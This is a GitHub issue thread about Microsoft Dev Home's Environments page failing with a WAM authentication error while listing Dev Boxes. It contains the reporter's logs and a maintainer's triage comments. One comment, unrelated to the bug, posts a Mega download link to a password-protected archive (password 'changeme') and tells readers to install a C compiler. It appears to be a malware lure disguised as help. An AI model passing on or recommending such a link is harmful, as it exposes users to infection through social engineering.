### ISSUE TITLE
DevHome Environments crashes

### ISSUE THREAD

**Issue by lfiorini** [microsoft/devhome#3889]
### Dev Home version

0.1801.625.0

### Windows build number

10.0.22631.4169

### Steps to reproduce the bug

click on the Enviroments option

### Expected result

No errors

### Actual result

DisplayText: Unable to retrieve all Dev Boxes for .... One or more errors occurred. (WAM Error  
 Error Code: 3399614467 
 Error Message: (pii) 
 Internal Error Code: 558133255 
) 
DiagnosticText:  
ExtendedError: System.Runtime.InteropServices.COMException (0x80131500)
[2024/09/20 09:54:58.638 INF] (ComputeSystemViewModel) Registering ComputeSystemViewModel 'Debian GNU/Linux' from provider 'Microsoft WSL' with WeakReferenceMessenger
[2024/09/20 09:54:58.640 INF] (ComputeSystemViewModel) Registering pin operations for Debian GNU/Linux in background took 00:00:00.0001821

**Comment by pinpolhoxx** [comment]
maybe this will help
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by bbonaby** [comment]
Hi @lfiorini, when you say "crashes" do you mean the app crashes or that you just get that Dev Box error message in the UI/logs? It's a bug either way but based on your answer that will tell us where the fix would need to be.

**Comment by bbonaby** [comment]
FYI: @huzaifa-d  this one looks like its a dup of #3691
